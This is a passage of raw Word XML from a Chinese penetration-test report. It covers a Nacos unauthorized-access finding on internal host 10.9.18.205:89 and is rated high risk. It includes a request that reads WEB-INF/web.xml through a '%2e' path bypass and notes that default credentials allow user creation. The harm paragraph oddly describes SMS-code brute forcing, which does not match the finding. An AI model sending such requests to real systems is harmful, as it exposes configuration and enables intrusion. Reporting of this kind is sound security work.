      <w:bookmarkStart w:id="94" w:name="_Toc15464569"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="108"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1.1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nacos未授权访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA55EC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>未授权用户可以使用默认凭证登录nacos后台，并且可以调用api接口进行用户创建，密码修改等敏感操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9671A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>影响主机：</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14:paraId="0DB65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14:paraId="7375AE5B">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A15E1EC">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="249D4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14:paraId="7C16D0C9">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>10.9.18.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="121FA4AC">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A369618">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402A9C14">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>1  问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：</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712F4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14:paraId="35DE4BF8">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>GET /%2e/WEB-INF/web.xml HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="247F42FA">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Host: 10.9.18.205:89</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747FB6C5">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333CD6A8">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>.36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="574F170A">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71762247">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate, br</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="686095BA">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41979322">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Connection: keep-alive</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08707F4F">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="579708AB">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1EE5CEFE">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B15A560">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47FC4543">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01306693">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1959E68B">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18BC25E3">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2188B54F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>2  问题描述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485DCA09">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEC2EA4">
      <w:pPr>
        <w:pStyle w:val="110"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5387975" cy="3034665"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>
            <wp:docPr id="15" name="图片 15" descr="image-20241029192919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age-20241029192919844"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5387975" cy="3034665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8811F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3 问题危害：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFA3AF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>攻击者可以对短信验证码进行重复验证，爆破成功后进入后台进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D130D">
      <w:pPr>
        <w:pStyle w:val="112"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>风险级别</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>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566"/>
        <w:gridCol w:w="1186"/>
        <w:gridCol w:w="1075"/>
        <w:gridCol w:w="1140"/>
        <w:gridCol w:w="1123"/>
        <w:gridCol w:w="1073"/>
        <w:gridCol w:w="1112"/>
      </w:tblGrid>
      <w:tr w14:paraId="2DFD2B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1566" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15408966">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>威胁级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1186" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="656D53F6">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1075" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EBA73D2">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F60E6A5">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1123" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33EAA030">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1073" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2802CBCA">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>低危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="322B00E1">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51B68099">
      <w:pPr>
        <w:pStyle w:val="112"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5E34F">
